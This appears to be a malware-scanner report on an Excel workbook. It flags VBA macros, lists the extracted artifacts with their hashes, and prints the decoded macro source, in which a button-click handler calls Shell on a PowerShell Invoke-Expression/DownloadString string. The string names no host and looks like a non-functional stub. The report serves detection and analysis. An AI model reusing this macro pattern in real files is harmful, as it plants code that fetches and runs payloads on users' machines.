MALICIOUS
Risk Score: 140
Heuristics 3
- VBA project inside OOXML (medium, OOXML_VBA, 2 related findings): Document contains a VBA project — VBA macros present
- Potential Shell call in VBA (critical, OLE_VBA_SHELL). Matched line in script: `Dbl = Shell(Program, vbNormalFocus)`
- PowerShell reference in VBA (critical, OLE_VBA_PS). Matched line in script: `Program = "powershell.exe Invoke-Expression(DownloadString DownloadFile ReadAllBytes)"`
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 838 bytes | aa0bdf27b89c7859bdc3c80115134e4d05090c81c539eff16f49919ebc53c4eb |
| vbaProject_00.bin | vba-project | OOXML VBA project: xl/vbaProject.bin | 15360 bytes | 95d7e1004432d72ea12e73e16f71ca0087e24e3325ae06295b0aa6d2476573b8 |

Preview of macros.bas (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "Module1"
Sub Rectangle1_Click()
    Dim Program As String
    Dim Dbl As Double
    Program = "powershell.exe Invoke-Expression(DownloadString DownloadFile ReadAllBytes)"
    Dbl = Shell(Program, vbNormalFocus)
End Sub
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
```